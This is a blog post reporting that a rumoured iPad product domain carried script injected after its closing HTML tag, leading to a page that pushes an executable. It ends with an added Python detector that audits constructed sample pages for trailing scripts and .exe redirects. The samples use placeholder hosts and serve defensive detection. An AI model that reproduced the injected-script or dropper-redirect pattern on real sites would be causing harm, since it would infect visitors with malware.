As Apple prepares to amaze the world with its planned announcement today on whatever it is they are officially going to announce, I decided to take a look at the possible names for the device and see if I could get a sneak peek at the domains that might reflect the new product. My surprise is not so much that some names would not resolve, but that one of the domains has links to suspected malware embedded after the closing HTML tag.
Warning: be very careful clicking links on these sites. Use a strong, secure browser, or better, sandbox this whole exercise before you click on anything. Everything here is pictures with no links back, but if you reproduce these steps, you do so at your own risk.
iPad.com is a suggested name for the new device being developed and announced today by Apple. A lot of people are going to want to check whether web sites are up and running for the suggested names, iSlate, iPad, and a few others that have been floated for the system. Hackers seem to have injected code after the closing </html> tag on the iPad.com landing page that opens the standard Chinese semi-porn junk site, plus another site that will attempt to download QVodSetup3.exe onto your computer.
Here is the iPad.com landing page. It looks like a super secret page, exactly what you would expect to see for a soon-to-launch product.
That is, until you open the source of the page (looking for developer comments).
After the closing HTML tag you see an interesting piece of JavaScript, as shown in the picture. Using Notepad, I opened the two linked files to see what was there.
Ladown is a common spammy Chinese site with no major issues, but IL21 caught my attention because it tries to load QVodSetup3.exe when the page loads, as shown below.
Looking the file up in Google showed that it is associated with a number of bad behaviors, and that it is easily stopped by many of the anti-virus programs on the market today. Not sophisticated, but knowing how many people do not update their AV, or surf the net without an AV package at all, this would be an effective program for simple Trojan work.
The interesting part is the WHOIS record for the iPad domain: the registrar is one that is in trouble with InterNIC, and the record has very generic data as to who the actual owner is.
With all the hype around Apple's new product launch, and if this turns out to be the actual domain, Apple will wipe this out in a bit, leaving it as a hacker's historical footnote, which is why I captured all of this in pictures. But if you are launching a highly visible product with mountains of hype to go along with it, hackers are not going to be far behind. It would be a good idea to check all the possible domains, grab the ones you can, and if there is malware on any of them, report those web sites to stopbadware.org.
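The two checks the post walks through by hand (looking for script injected after the closing </html> tag, and looking for a page that pushes an executable download) can be scripted so that every candidate product-name domain is audited the same way. The following is an added example, not code from the original post, and it runs offline over constructed sample pages: the host names (ipad.example, islate.example, dropper.invalid, first.invalid, second.invalid) are reserved placeholder names and the page bodies are made up to mimic what the post describes, with only the QVodSetup3.exe file name taken from the post. Fetching live pages is deliberately left out; if you wire this up to real requests, do it from a sandboxed machine, as the warning above says.

```python
"""Audit candidate landing pages for (1) markup injected after the closing </html>
tag and (2) references to executable downloads. Added example; all sample pages
below are constructed, and the host names are reserved placeholder names."""
import re
from urllib.parse import urlparse

# Absolute http(s) URLs in src=, href=, meta-refresh url= or bare text.
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.I)
SCRIPT_RE = re.compile(r"<script\b", re.I)
EXEC_EXTS = (".exe", ".scr", ".msi", ".bat", ".com", ".pif")

# Constructed samples (not captured from any real site):
#  - ipad.example: a placeholder page with two <script> tags appended after </html>
#  - islate.example: a clean parked page
#  - dropper.invalid: a page that redirects straight to an .exe, like the IL21 page
SAMPLE_PAGES = {
    "ipad.example": """<html><head><title>Coming soon</title></head>
<body><p>Coming soon.</p></body></html>
<script src="http://first.invalid/count.js"></script>
<script src="http://second.invalid/il21.js"></script>""",
    "islate.example": """<html><head><title>Parked</title></head>
<body><p>This domain is parked.</p></body></html>
""",
    "dropper.invalid": """<html><head>
<meta http-equiv="refresh" content="0;url=http://second.invalid/dl/QVodSetup3.exe">
</head><body>Loading...</body></html>
""",
}


def trailing_payload(html: str) -> str:
    """Return whatever follows the last closing </html> tag (empty if nothing does)."""
    idx = html.lower().rfind("</html>")
    if idx < 0:
        return ""
    return html[idx + len("</html>"):].strip()


def extract_urls(fragment: str) -> list:
    """Absolute http(s) URLs in a markup fragment, in document order, deduplicated."""
    seen, out = set(), []
    for m in URL_RE.finditer(fragment):
        url = m.group(0).rstrip(".,;")
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def executable_downloads(html: str) -> list:
    """URLs anywhere in the page whose path ends in an executable extension."""
    return [u for u in extract_urls(html)
            if urlparse(u).path.lower().endswith(EXEC_EXTS)]


def audit_page(host: str, html: str) -> dict:
    """Summarise both indicators for one landing page served by `host`."""
    tail = trailing_payload(html)
    tail_urls = extract_urls(tail)
    exe_urls = executable_downloads(html)
    trailing_script = bool(SCRIPT_RE.search(tail))
    return {
        "host": host,
        "trailing_script": trailing_script,
        "trailing_urls": tail_urls,
        # Hosts the injected tail pulls from that are not the page's own host.
        "third_party_tail_hosts": sorted({urlparse(u).hostname for u in tail_urls} - {host}),
        "exe_downloads": exe_urls,
        "suspicious": trailing_script or bool(exe_urls),
    }


def audit_all(pages: dict) -> list:
    """Audit every candidate host and return only the ones flagged suspicious."""
    return [r for r in (audit_page(h, p) for h, p in pages.items()) if r["suspicious"]]


if __name__ == "__main__":
    for result in audit_all(SAMPLE_PAGES):
        print(result)
```

The "content after </html>" check is crude but useful precisely because legitimate placeholder pages almost never have markup there, so anything found after the closing tag deserves a look; the executable-extension check catches the second-stage page that redirects to an .exe, which a browser would happily fetch. Both are indicators for a human to follow up in a sandbox, not proof of malware on their own.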
(Cross-posted @ IT Toolbox)